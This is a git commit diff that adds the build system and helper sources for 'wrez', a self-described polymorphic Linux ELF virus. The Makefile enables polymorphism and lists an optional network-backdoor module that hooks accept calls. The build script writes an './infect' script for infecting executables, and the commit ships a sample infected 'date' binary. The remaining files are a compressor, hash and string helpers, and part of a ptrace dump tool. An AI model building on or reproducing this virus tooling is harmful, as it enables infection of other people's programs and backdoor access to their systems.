initial

109 files changed, 14227 insertions, 0 deletions

diff --git a/other/wrez/Makefile b/other/wrez/Makefile
new file mode 100644
index 0000000..680b40d
--- /dev/null
+++ b/other/wrez/Makefile
@@ -0,0 +1,192 @@
+
+VERSION=0.7.8
+DFLAGS += -DPOLYMORPHISM        # make the virus polymorph
+
+# LOOKUP module (lookup.[ch])
+#DFLAGS += -DLOOKUP             # PLT/GOT capabilities
+#DFLAGS += -DLOOKUP_LIBC_CALL_EXAMPLE   # call system from within the virus
+#DFLAGS += -DLOOKUP_GOT_REDIRECTION_EXAMPLE     # redirect printf calls of host
+#DFLAGS += -DLOOKUP_GOT_DEEP_REDIRECTION_EXAMPLE        # redirect deep calls of libs
+
+# INMEM module (inmem.[ch])
+#DFLAGS += -DINMEM
+
+# FINGERPRINT module (fingerprint.c, crypto.c)
+#DFLAGS += -DFINGERPRINT
+
+# NETWORK BACKDOOR module, using accept
+#DFLAGS += -DLOOKUP_BACKDOOR_NETWORK_MAGIC      # hooks all accept calls
+
+
+###
+### DO NOT CHANGE ANYTHING BELOW THIS LINE
+###
+
+CFLAGS += -Wall -fconserve-space -Os -fno-builtin $(DFLAGS) -g -ggdb
+
+OBJS =  wrcore.o inmem.o lime.o lime-interface.o lookup.o fingerprint.o crypto.o
+
+
+CC=gcc-2.95
+CC_USER=gcc
+CFLAGS_USER=-Wall -g -ggdb
+
+all:    wrez
+
+dist:   releaseclean release
+        make distclean
+
+releaseclean:   distclean
+        rm -fR release*
+
+release:        releaseclean wrez sweep clean
+        rm -fR release*
+        mkdir release-$(VERSION)
+        mv wrez.bin.out wrez.bin.conf initial infect wrezsweep \
+                release-$(VERSION)/
+
+distclean:      clean
+        rm -f wrez.map
+        rm -f wrez.bin.out
+        rm -f infect initial
+
+clean:  cryptoclean limeclean lookupclean
+        rm -f wrez
+        rm -f *.o
+        rm -f wrezdefs.h wrezdefs.inc
+
+        echo | awk '{ printf ("#define WREZ_CFG_START 0x41414141\n"); }' >> wrezdefs.h
+        echo | awk '{ printf ("#define WREZ_SIZE 0x41414141\n"); }' >> wrezdefs.h
+        echo | awk '{ printf ("wrez_len equ 0x41414141\n"); }' >> wrezdefs.inc
+
+        # additional build process stuff
+        rm -f compressor
+        rm -f wrez.bin wrez.2nd wrez.2nd.compressed
+
+fclean:
+        rm -f wrez *.o
+
+sweep:  wrezsweep.c
+        $(CC) -o wrezsweep wrezsweep.c -Wall -g -ggdb
+
+# lookup and linker engine
+lookupclean:
+        rm -f lookup
+        rm -fR lookup-test
+
+lookuptest:     lookup.c
+        rm -fR lookup-test
+        mkdir lookup-test
+        cd lookup-example ; ./shared-library-build.sh ; cd ..
+        $(CC_USER) $(CFLAGS_USER) -Llookup-example -lshared-library \
+                -DTESTING -DTESTING_DEBUG -o lookup lookup.c
+        mv lookup lookup-test/
+        mv lookup-example/libshared-library.so lookup-test/
+        mv lookup-example/shared-library-use lookup-test/
+        echo "# use with 'source ldpath.sh' to set LD_LIBRARY_PATH" > lookup-test/ldpath.sh
+        echo >> lookup-test/ldpath.sh
+        echo "export LD_LIBRARY_PATH=\`pwd\`" >> lookup-test/ldpath.sh
+        chmod 755 lookup-test/ldpath.sh
+
+lookuptestpm:   lookup-pm.c
+        rm -fR lookup-test
+        mkdir lookup-test
+        cd lookup-example ; ./shared-library-build.sh ; cd ..
+        $(CC_USER) $(CFLAGS_USER) -Llookup-example -lshared-library \
+                -DTESTING -DTESTING_DEBUG -o lookup-pm lookup-pm.c
+        mv lookup-pm lookup-test/
+        mv lookup-example/libshared-library.so lookup-test/
+        mv lookup-example/shared-library-use lookup-test/
+        echo "# use with 'source ldpath.sh' to set LD_LIBRARY_PATH" > lookup-test/ldpath.sh
+        echo >> lookup-test/ldpath.sh
+        echo "export LD_LIBRARY_PATH=\`pwd\`" >> lookup-test/ldpath.sh
+        chmod 755 lookup-test/ldpath.sh
+
+# in-memory infection engine
+inmemtest:      inmem.c lookup-pm.c
+        $(CC_USER) $(CFLAGS_USER) -c -o lookup-pm.o lookup-pm.c
+        @echo
+        @echo "# ignore warnings about missing external prototypes in 'inmem'"
+        @echo
+        $(CC_USER) $(CFLAGS_USER) -o inmem inmem.c lookup-pm.o -DTESTING
+        $(CC_USER) $(CFLAGS_USER) -o /tmp/inmem-test inmem-test.c
+        @echo
+        @echo "# fix the page permissions of ./inmem executeable to +rwx on first segment"
+        @echo
+
+# the compressor (not included within final binary)
+compressor:     compressor.c
+        $(CC) -o compressor compressor.c -O2 -g -ggdb
+
+initial:        initial.c
+#       diet $(CC) -static -o initial initial.c -g -ggdb -Wall
+        $(CC) -o initial initial.c -g -ggdb -Wall
+
+# polymorphism engine (lime)
+lime.o: lime.asm
+        nasm -f elf -o lime.o lime.asm
+
+limeclean:
+        rm -f lime-interface-test lime*.o
+
+limetest:       lime-interface-test.c lime-interface.o lime.o
+        $(CC) $(CFLAGS) -c -o lime-interface-test.o lime-interface-test.c
+        ld -s -T lime-interface-test.lds -o lime-interface-test
+
+# crypto stuff
+cryptotest:     crypto-test.c crypto.c
+        $(CC_USER) $(CFLAGS_USER) -o crypto-test crypto-test.c crypto.c
+        ./crypto-test AAAAAAAA
+        ./crypto-test aaaaaaaa
+
+cryptoclean:
+        rm -f crypto-test
+
+wrez:   compress.sh compressor initial wrez.asm $(OBJS)
+
+ifneq ($(final),on)
+        rm -f wrezdefs.inc wrezdefs.h
+        echo | awk '{ printf ("wrez_len equ 0x41414141\n"); }' >> wrezdefs.inc
+        nasm -f elf -o wrez.o wrez.asm
+
+        nm wrez.o | grep "wrcfg$$" | \
+                awk '{ printf ("#define WREZ_CFG_START 0x%s\n", $$1); }' \
+                >> wrezdefs.h
+        echo | awk '{ printf ("#define WREZ_SIZE 0x41414141\n"); }' >> wrezdefs.h
+        # link using preprocessing linkmap description file
+        rm -f wrez-link-actual.lds
+        gcc -E -C -P -nostdinc $(DFLAGS) -x c-header wrez-link.lds > wrez-link-actual.lds
+        ld -Map wrez.map -s -T wrez-link-actual.lds -o wrez
+#       ld -Map wrez.map -T wrez-link.lds -o wrez
+        rm -f wrez-link-actual.lds
+        size wrez | grep wrez | \
+                awk '{ if ($$2 != 0 || $$3 != 0) { \
+                        printf ("\nWARNING: non-zero absolute elements\n\n"); \
+                        exit (1); } }'
+
+        # get proper size
+        size wrez | grep wrez | \
+                awk '{ printf ("#define WREZ_SIZE %s\n", $$1); }' \
+                >> wrezdefs.h
+        cat wrezdefs.h | grep -v "#define WREZ_SIZE 0x41414141" > wrezdefs.h.temp
+        mv wrezdefs.h.temp wrezdefs.h
+
+        # fixup length in .inc assembler include file
+        size wrez | grep wrez | \
+                awk '{ printf ("wrez_len equ %s\n", $$1); }' \
+                > wrezdefs.inc
+
+        make final=on fclean wrez
+else
+        nasm -f elf -o wrez.o wrez.asm
+        rm -f wrez-link-actual.lds
+        gcc -E -C -P -nostdinc $(DFLAGS) -x c-header wrez-link.lds > wrez-link-actual.lds
+        ld -Map wrez.map -s -T wrez-link-actual.lds -o wrez
+        rm -f wrez-link-actual.lds
+
+        echo;echo "### final initial infector built. (version $(VERSION))";echo;size wrez
+
+        ./compress.sh
+endif
+
+
diff --git a/other/wrez/common.c b/other/wrez/common.c
new file mode 100644
index 0000000..f791e63
--- /dev/null
+++ b/other/wrez/common.c
@@ -0,0 +1,128 @@
+
+#ifndef COMMON_C
+#define COMMON_C
+
+#ifndef NULL
+#define NULL    ((void *) 0)
+#endif
+
+
+static inline void
+memcpy (void *dst, void *src, unsigned int len)
+{
+        __asm__ __volatile__ ("
+                cld
+                rep movsb
+                " : : "c" (len), "S" (src), "D" (dst));
+}
+
+
+static inline int
+memcmp (unsigned char *s1, unsigned char *s2, unsigned int len)
+{
+        register unsigned int   reg_ecx;
+
+        __asm__ __volatile__ ("
+                cld
+                repe cmpsb
+                je      lme
+                incl    %%ecx
+        lme:
+                " : "=c" (reg_ecx) : "c" (len), "S" (s1), "D" (s2));
+
+        return (reg_ecx);
+}
+
+
+static inline void
+memset (void *dst, unsigned char wrbyte, unsigned int len)
+{
+        __asm__ __volatile__ ("
+                cld
+                rep stosb
+                " : : "c" (len), "D" (dst), "a" (wrbyte));
+}
+
+
+static inline int
+strcmp (unsigned char *s1, unsigned char *s2)
+{
+        register unsigned int   reg_ecx;
+
+        __asm__ __volatile__ ("
+                xorl    %%ecx, %%ecx
+                xorl    %%eax, %%eax
+                pushl   %%esi
+                cld
+        ls0:    lodsb
+                incl    %%ecx
+                or      %%eax, %%eax
+                jnz     ls0
+
+                popl    %%esi
+                repe    cmpsb
+                " : "=c" (reg_ecx) : "S" (s1), "D" (s2) : "eax");
+
+        return (reg_ecx);
+}
+
+
+static inline int
+strlen (unsigned char *s1)
+{
+        register unsigned int   reg_ecx;
+
+        __asm__ __volatile__ ("
+                xorl    %%eax, %%eax
+                movl    %%eax, %%ecx
+                decl    %%ecx
+                repne scasb
+                not     %%ecx
+                decl    %%ecx
+                " : "=c" (reg_ecx) : "D" (s1) : "eax");
+
+        return (reg_ecx);
+}
+
+
+#if 0
+/* gcc's version is smaller, doh!
+ */
+static inline int
+strstr (unsigned char *s1_hay, unsigned char *s2_needle)
+{
+        register unsigned int   reg_ecx;
+
+        __asm__ __volatile__ ("
+                xorl    %%ecx, %%ecx
+        lss_%=: movb    (%%esi), %%al
+                orb     %%al, %%al
+                jz      lso_%=
+                pushl   %%esi
+                pushl   %%edi
+        ls0_%=: cmpsb
+                jne     ls1_%=
+                cmpb    $0x0, (%%edi)
+                je      lse_%=
+                jmp     ls0_%=
+        ls1_%=: popl    %%edi
+                popl    %%esi
+                incl    %%esi
+                jmp     lss_%=
+        lso_%=: incl    %%ecx
+        lse_%=:
+                " : "=c" (reg_ecx) : "S" (s1_hay), "D" (s2_needle) : "eax");
+
+}
+#endif
+
+
+static inline void
+strcpy (unsigned char *dst, unsigned char *src)
+{
+        memcpy (dst, src, strlen (src) + 1);
+}
+
+#endif
+
+
diff --git a/other/wrez/commontest.c b/other/wrez/commontest.c
new file mode 100644
index 0000000..5ad2982
--- /dev/null
+++ b/other/wrez/commontest.c
@@ -0,0 +1,38 @@
+
+#include <stdio.h>
+#include "common.c"
+
+
+int
+main (int argc, char *argv[])
+{
+        unsigned char   foo[4];
+        unsigned char   src[64],
+                        dst[64];
+
+        memset (src, 'a', 64);
+        src[sizeof (src) - 1] = '\0';
+        memcpy (dst, src, sizeof (dst));
+        src[sizeof (src) - 1] = '\n';
+
+        printf ("memcmp (src, dst, 64) = %d\n",
+                memcmp (src, dst, sizeof (src)));
+
+        printf ("strlen (\"hello world\") = %d\n", strlen ("hello world"));
+        printf ("strlen (\"\") = %d\n", strlen (""));
+
+        foo[3] = '\0';
+        memset (foo, '\x41', 3);
+        printf ("foo[0],[1],[2],[3]: 0x%02x 0x%02x 0x%02x 0x%02x\n",
+                foo[0], foo[1], foo[2], foo[3]);
+
+        printf ("strcmp (\"foobar\", \"foobaz\") == %d\n",
+                strcmp ("foobar", "foobaz"));
+        printf ("strcmp (\"foobar\", \"foobar\") == %d\n",
+                strcmp ("foobar", "foobar"));
+
+
+        return (0);
+}
+
+
diff --git a/other/wrez/compress.sh b/other/wrez/compress.sh
new file mode 100755
index 0000000..2ba65f3
--- /dev/null
+++ b/other/wrez/compress.sh
@@ -0,0 +1,74 @@
+#!/bin/sh
+
+# later gcc versions (also the 2.95 trunk) changed formatting to 64 bit
+cat wrez.map | sed s/0x00000000/0x/g > wrez.map-tmp
+mv wrez.map-tmp wrez.map
+
+skip=`cat wrez.map | mawk '
+/wrez_init/ { wrez_init = $1; }
+/data_start/ { data_start = $1; }
+END { print (data_start - wrez_init); }'`
+
+wrcfgrel=`cat wrez.map | mawk '
+/wrez_init/ { wrez_init = $1; }
+/wrcfg/ { wrcfg = $1; }
+END { print (wrcfg - wrez_init); }'`
+
+echo uncompressed data starts at +$skip
+echo wrconfig structure at +$wrcfgrel
+
+rm -f wrez.bin
+cp wrez wrez.bin
+echo extracting virus image to wrez.bin
+objcopy -j .text -O binary wrez.bin
+
+echo extracting data to compress to wrez.2nd
+rm -f wrez.2nd
+dd bs=1 if=wrez.bin of=wrez.2nd skip=$skip
+
+echo compressing wrez.2nd to wrez.2nd.compressed
+lzstuff=`./compressor -s wrez.2nd wrez.2nd.compressed`
+echo === LZ information: $lzstuff
+
+echo joining the decompressor and the compressed data to wrez.bin.out
+rm -f wrez.bin.out
+dd bs=1 if=wrez.bin of=wrez.bin.out count=$skip
+dd bs=1 if=wrez.2nd.compressed of=wrez.bin.out seek=$skip
+
+echo infecting first victim file
+#rm -f victim
+#cp `which date` victim.clean
+#cp victim.clean victim
+echo
+echo -n "### final virus size: "
+ls -l wrez.bin.out | awk '{ print $5 }'
+echo
+
+echo building configuration file
+rm -f wrez.bin.conf
+cat > wrez.bin.conf << __EOF__
+configrel $wrcfgrel
+skip $skip
+compress $lzstuff
+__EOF__
+
+echo building ./infect script
+rm -f infect
+cat > infect << __EOF__
+#!/bin/sh
+
+if [ \$# != 1 ]; then
+        echo "usage: \$0 pathname"
+        echo
+        exit
+fi
+cp \$1 victim
+./initial victim
+mv victim \$1.infected
+ls -l \$1 \$1.infected
+__EOF__
+chmod 700 ./infect
+echo
+echo "### done, you can infect executeable with \"./infect pathname\" now"
+echo
+
diff --git a/other/wrez/compressor b/other/wrez/compressor
new file mode 100755
index 0000000..e8f2aa6
--- /dev/null
+++ b/other/wrez/compressor
diff --git a/other/wrez/compressor.c b/other/wrez/compressor.c
new file mode 100644
index 0000000..91f3569
--- /dev/null
+++ b/other/wrez/compressor.c
@@ -0,0 +1,466 @@
+
+/* ripped from:
+ *   kim holviala (kimmy/pulp)
+ *   sed
+ *
+ * i'm sorry for ripping this, but as i just cut code from it, it does not
+ * matter that much gpl-wise. uhhohh.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+
+#define byte unsigned char
+#define word unsigned short
+#define dword unsigned long
+
+#define OK 0
+#define ERROR 1
+
+#define MAXSIZE 20000
+
+#define TRUE 1
+#define FALSE 0
+
+
+byte _buffer[MAXSIZE], lzbuffer[MAXSIZE];
+byte * buffer=0;
+word lenght=0, lzlenght=0, hufflimit1=0, hufflimit2=0, lenlimit=0, decodelenght=0;
+int maxhuffman=0, dummy=0;
+int bitpos=0;
+
+char *rotorchar = "-/|\\";
+
+char *info = "Six-2-Four v1.0 - Exepacker for 4Kb-intros.\n"
+             "Copyright (c) Kim Holviala a.k.a Kimmy/PULP Productions 1997.\n"
+             "Linux version - Sed (sed@free.fr) october 1999\n"
+             "                Licenced under the terms of the GNU General Public Licence.\n";
+
+char *help = "    Usage: 624 [-s] infile [outfile]\n\n"
+             "    Where: -s      - use super duper compression\n"
+             "           infile  - tinlinked file shorter than 20000 bytes\n"
+             "This program is EMAILWARE. You're free to use this even with commercial\n"
+             "programs, AFTER you email me to <kimmy@iki.fi> and tell me the name of\n"
+             "your favorite dark beer!\n"
+             "The Linux version you are running in licenced under the terms\nof the GNU General Public Licence.\n"
+             "It requires nasm (available at http://www.web-sites.co.uk/nasm/index.html)\n"
+             "and tinlink 1.0 (available at http://sed.free.fr/tinlink/index.html)\n";
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Write one bit to the lzbuffer
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+void writebit(word bit) {
+    byte mask = 1;
+
+    mask <<= bitpos;
+
+    if (bit == 0) lzbuffer[lzlenght] &= 255-mask;
+    else lzbuffer[lzlenght] |= mask;
+
+    if (++bitpos > 7) {
+
+        bitpos = 0;
+        lzlenght++;
+
+        /* it's possible to have a bigger file than the original, in that case,
+         * we must stop
+         */
+        if (lzlenght >= MAXSIZE) {
+            fprintf(stderr, "\nSorry, but the compressed file would be too big.\n");
+            exit(1);
+        }
+    }
+}
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Write n bits to the lzbuffer
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+void writedata(word b, word mask) {
+
+    do {
+        writebit(b & mask);
+        mask >>= 1;
+
+    } while (mask > 0);
+}
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Write one "huffman"-coded number to the lzbuffer
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+void writehuffman(word number) {
+
+    word mask;
+
+
+    number--;
+
+    if (number < (hufflimit1 * 2)) {
+
+        writebit(0);
+        mask = hufflimit1;
+    }
+    else {
+        number -= (hufflimit1 * 2);
+
+        writebit(1);
+        mask = hufflimit2;
+    }
+
+
+    do {
+        writebit(number & mask);
+        mask >>= 1;
+
+    } while (mask > 0);
+}
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Return log2 (if that's what it is?)
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+word log2(word l) {
+
+    switch (l) {
+        case 1: return 0;
+        case 2: return 1;
+        case 4: return 2;
+        case 8: return 3;
+        case 16: return 4;
+        case 32: return 5;
+        case 64: return 6;
+        case 128: return 7;
+        case 256: return 8;
+        case 512: return 9;
+        case 1024: return 10;
+        case 2048: return 11;
+        case 4096: return 12;
+    }
+
+    return 0;
+}
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Compress the file
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+void squeeze(void) {
+
+    int count1=0, count2=0;
+    word bestlen=0, bestpos=0, len=0;
+    byte b=0;
+
+
+    lzlenght = 0;
+    bitpos=0;
+
+    for (count1 = 0; count1 < lenght; count1++) {
+
+        bestlen = 0;
+        b = buffer[count1];
+
+        for (count2 = (count1 - 1); count2 > (count1 - maxhuffman); count2--) {
+
+            if (count2 < 0) break;
+
+            if (buffer[count2] == b) {
+
+                for (len = 1; len < maxhuffman; len ++) {
+
+                    if ((count1 + len) > lenght) break;
+                    if (buffer[count1 + len] != buffer[count2 + len]) break;
+                }
+
+                if (len > bestlen) {
+
+                    bestlen = len;
+                    bestpos = count1 - count2;
+                }
+            }
+
+        }
+
+        if (bestlen == 1 && bestpos < 17) {
+
+            writebit(1);
+            writebit(0);
+            writedata(bestpos - 1, 8);
+
+            continue;
+        }
+
+        if (bestlen > 1) {
+
+            if (bestlen < lenlimit) {
+
+                for (count2 = 0; count2 < bestlen; count2++) writebit(1);
+                writebit(0);
+            }
+            else {
+                for (count2 = 0; count2 < lenlimit; count2++) writebit(1);
+                writehuffman(bestlen - 1);
+            }
+
+            count1 += bestlen - 1;
+            writehuffman(bestpos);
+
+            continue;
+        }
+
+        writebit(0);
+        writedata(b, 128);
+    }
+
+    lzlenght++;
+}
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Find the best compression values
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+void compress(void) {
+
+    word besthl1=0, besthl2=0, bestll=0, bestlzlen;
+    byte rotor = 0;
+
+
+    lenlimit = 9;
+    bestlzlen = 60000;
+
+    for (hufflimit1 = 4; hufflimit1 <= 64; hufflimit1 *= 2)
+    for (hufflimit2 = hufflimit1 * 4; hufflimit2 <= 2048; hufflimit2 *= 2) {
+
+        fflush(stdout);
+        rotor++;
+        rotor&=3;
+
+        maxhuffman = (hufflimit2 + hufflimit1) * 2;
+
+        squeeze();
+
+        if (lzlenght < bestlzlen) {
+
+            besthl1 = hufflimit1;
+            besthl2 = hufflimit2;
+            bestlzlen = lzlenght;
+        }
+    }
+
+    hufflimit1 = besthl1;
+    hufflimit2 = besthl2;
+    maxhuffman = (hufflimit2 + hufflimit1) * 2;
+    bestlzlen = 60000;
+
+    for (lenlimit = 5; lenlimit <= 15; lenlimit++) {
+
+        fflush(stdout);
+        rotor++;
+        rotor&=3;
+
+        squeeze();
+
+        if (lzlenght < bestlzlen) {
+
+            bestll = lenlimit;
+            bestlzlen = lzlenght;
+        }
+    }
+
+    lenlimit = bestll;
+
+    squeeze();
+}
+
+
+
+/*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
+ *
+ *  Main
+ *
+ *±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*/
+
+int
+main (int argc, char *argv[])
+{
+    FILE *out;
+    FILE *fp;
+    char *destfile="un624.linux.compressed.bin.712SAk", *srcfile, slow;
+    char *aoutfile="a.out";
+    long ratio;
+    unsigned long starting_offset, new_offset, memory;
+    char tin[1024];
+
+    buffer=_buffer;
+
+
+    if (argc<2) {
+        puts(help);
+        fprintf(stderr, "Bad number of arguments.\n");
+        return ERROR;
+    }
+
+    if (argv[1][0] == '-') {
+        if (argv[1][1] != 's' || argv[1][2]) {
+            puts(help);
+            fprintf(stderr, "Unkown option '%s'\n", argv[1]);
+            return ERROR;
+        }
+        if (argc < 3 || argc > 4) {
+            puts(help);
+            fprintf(stderr, "Bad number of arguments.\n");
+            return ERROR;
+        }
+        slow = TRUE;
+        srcfile = argv[2];
+        if (argc==4)
+            aoutfile=argv[3];
+    }
+    else {
+        if (argc < 2 || argc > 3) {
+            puts(help);
+            fprintf(stderr, "Bad number of arguments.\n");
+            return ERROR;
+        }
+        slow = FALSE;
+        srcfile = argv[1];
+        if (argc==3)
+            aoutfile=argv[2];
+    }
+
+
+    if ((fp = fopen(srcfile, "rb")) == NULL) {
+
+        printf("File not found!\n");
+        return ERROR;
+    }
+
+    lenght = (word) fread(buffer, 1, MAXSIZE, fp);
+    if (lenght == 0) {
+
+        printf("Error reading from file!\n");
+        fclose(fp);
+
+        return ERROR;
+    }
+
+#if 0
+    lenght-=74;
+    buffer+=74;
+#endif
+
+#if 0
+    if (fread(&dummy, 1, 1, fp) != 0) {
+        printf("File too big (must be < 20000 bytes)!\n");
+        fclose(fp);
+        return ERROR;
+    }
+#endif
+
+    fclose(fp);
+
+
+    if (slow == TRUE) compress();
+    else {
+        hufflimit1 = 16;
+        hufflimit2 = 128;
+        lenlimit = 9;
+        maxhuffman = (hufflimit2 + hufflimit1) * 2;
+        squeeze();
+    }
+
+
+    if ((fp = fopen(aoutfile, "wb")) == NULL) {
+        printf("Cannot create file '%s'\n", aoutfile);
+        return ERROR;
+    }
+    fwrite(lzbuffer, 1, lzlenght, fp);
+    fclose(fp);
+
+    printf ("%d:%d:%d:%d:%d\n",
+            lzlenght, lenlimit-1, log2(hufflimit1)+1, log2(hufflimit2)+1, (hufflimit1 * 2)+1);
+#if 0
+    fprintf (stderr, "%%define data_length %d\n"
+            "%%define llstuff %d\n"
+            "%%define hl1stuff %d\n"
+            "%%define hl2stuff %d\n"
+            "%%define hf2stuff %d\n",
+            lzlenght, lenlimit-1, log2(hufflimit1)+1, log2(hufflimit2)+1, (hufflimit1 * 2)+1);
+#endif
+
+#if 0
+    ratio = ((long) lenght - (long) lzlenght) * 100 / ((long) lenght);
+    printf("Done!\n\nInput/Output ratio: %i/%i bytes (saved %ld%%)\n",
+           lenght, lzlenght, ratio);
+
+    /* Ok, let's now create the asm file */
+    /* the unpack routine is placed before the place where the unpacked code is said to be,
+     * according to the elf header (is it clean ? mmm, I guess not...).
+     */
+    buffer-=74;
+    starting_offset=*(unsigned long *)((char *)buffer+24);
+    memory=*(unsigned long *)((char *)buffer+64);
+    new_offset=starting_offset-lzlenght-74;
+    new_offset&=~4095;
+    new_offset+=74;
+    memory+=starting_offset - new_offset+4095;
+    memory&=~4095;
+
+    if (!(out=fopen("624.a.out.asm.816HDq", "wb"))) {
+      perror("624.a.out.asm.816HDq");
+      return ERROR;
+    }
+    fprintf(out, "BITS 32\n"
+            "org 0x%lx\n"
+            "%%define decompress_to 0x%lx\n"
+            "%%define data_length %d\n"
+            "%%define llstuff %d\n"
+            "%%define hl1stuff %d\n"
+            "%%define hl2stuff %d\n"
+            "%%define hf2stuff %d\n",
+            new_offset, starting_offset, lzlenght, lenlimit-1, log2(hufflimit1)+1, log2(hufflimit2)+1, (hufflimit1 * 2)+1);
+    fprintf(out, "%s", unpacker);
+    fprintf(out, "incbin \"%s\";\n", destfile);
+    fclose(out);
+
+    /* ok, let's nasm it and tinlink it */
+    /* don't worry about all those sprintf in a fixed size buffer, overflow is not possible */
+    sprintf(tin, "nasm -f bin -o 624.a.out.compressed.0012Aq 624.a.out.asm.816HDq");
+    fprintf(stderr, "%s\n", tin);
+    system(tin);
+    sprintf(tin, "tinlink -o %s -c 624.a.out.compressed.0012Aq -m %ld -s %p", aoutfile, memory, (unsigned char *)new_offset);
+    fprintf(stderr, "%s\n", tin);
+    system(tin);
+    sprintf(tin, "rm 624.a.out.compressed.0012Aq 624.a.out.asm.816HDq %s", destfile);
+    fprintf(stderr, "%s\n", tin);
+    system(tin);
+    return OK;
+#endif
+}
diff --git a/other/wrez/crypto-test.c b/other/wrez/crypto-test.c
new file mode 100644
index 0000000..c43f008
--- /dev/null
+++ b/other/wrez/crypto-test.c
@@ -0,0 +1,32 @@
+
+#include <sys/utsname.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "crypto.h"
+
+
+int
+main (int argc, char *argv[])
+{
+        char            hw[] = "hello world";
+        unsigned int    hash;
+        struct utsname  un;
+
+
+        hash = mhash (hw, sizeof (hw));
+        printf ("mhash(hw) = 0x%08x\n", hash);
+
+        uname (&un);
+        hash = mhash ((unsigned char *) &un, sizeof (un));
+        printf ("mhash(utsname) = 0x%08x\n", hash);
+
+        if (argc == 2) {
+                hash = mhash (argv[1], strlen (argv[1]));
+                printf ("mhash(\"%s\") = 0x%08x\n", argv[1], hash);
+        }
+
+        exit (EXIT_SUCCESS);
+}
+
+
diff --git a/other/wrez/crypto.c b/other/wrez/crypto.c
new file mode 100644
index 0000000..6c32870
--- /dev/null
+++ b/other/wrez/crypto.c
@@ -0,0 +1,24 @@
+/* crypto, cipher and obfuscation related functions
+ */
+
+#include "crypto.h"
+
+
+/* a very simple homemade hash function with no strong properties at all.
+ */
+unsigned int
+mhash (unsigned char *src, unsigned int len)
+{
+        unsigned int    hash = len;     /* some small initial gain */
+
+        for (hash = 0 ; len > 0 ; --len, ++src) {
+                hash ^= *src;
+                hash = ((hash & 0xffe00000) >> 21) |
+                        ((hash & 0x001fffff) << 11);
+                hash += *src;
+                hash += len;
+        }
+
+        return (hash);
+}
+
diff --git a/other/wrez/crypto.h b/other/wrez/crypto.h
new file mode 100644
index 0000000..75d99ec
--- /dev/null
+++ b/other/wrez/crypto.h
@@ -0,0 +1,23 @@
+
+#ifndef CRYPTO_H
+#define CRYPTO_H
+
+
+/* mhash
+ *
+ * produce a weak 32 bit hash value from a memory block at `src'. use `len'
+ * bytes from it to compute the hash value. it has no strong properties, but
+ * is sufficient for simple stuff. the hash value is also dependant on the
+ * `len' parameter.
+ *
+ * XXX: the memory block to be hashed should be at least 8 bytes long for the
+ *      hash to be sufficient !
+ *
+ * return hash value in any case
+ */
+
+unsigned int
+mhash (unsigned char *src, unsigned int len);
+
+#endif
+
diff --git a/other/wrez/crypto.o b/other/wrez/crypto.o
new file mode 100644
index 0000000..209b303
--- /dev/null
+++ b/other/wrez/crypto.o
diff --git a/other/wrez/date b/other/wrez/date
new file mode 100755
index 0000000..4138b56
--- /dev/null
+++ b/other/wrez/date
diff --git a/other/wrez/date.infected b/other/wrez/date.infected
new file mode 100755
index 0000000..ba9e809
--- /dev/null
+++ b/other/wrez/date.infected
diff --git a/other/wrez/debug/pcdebug.c b/other/wrez/debug/pcdebug.c
new file mode 100644
index 0000000..86ee12b
--- /dev/null
+++ b/other/wrez/debug/pcdebug.c
@@ -0,0 +1,250 @@
+/* memory dump utility
+ * -scut
+ */
+
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <libgen.h>     /* basename */
+
+
+void
+hexdump (unsigned char *data, unsigned int amount);
+
+
+int
+main (int argc, char *argv[])
+{
+        pid_t                   fpid;           /* child pid, gets ptraced */
+        char *                  argv0;
+        struct user             regs;           /* PTRACE pulled registers */
+        unsigned long int       addr,           /* segment start address */
+                                addr_end,       /* segment end address */
+                                len;            /* length of segment */
+        unsigned long int       addr_walker,    /* walker to dump memory */
+                                eip;            /* current childs eip */
+
+        /* array to temporarily store data into */
+        unsigned char           data_saved[sizeof (unsigned long int)];
+
+        /* file to read mapping information */
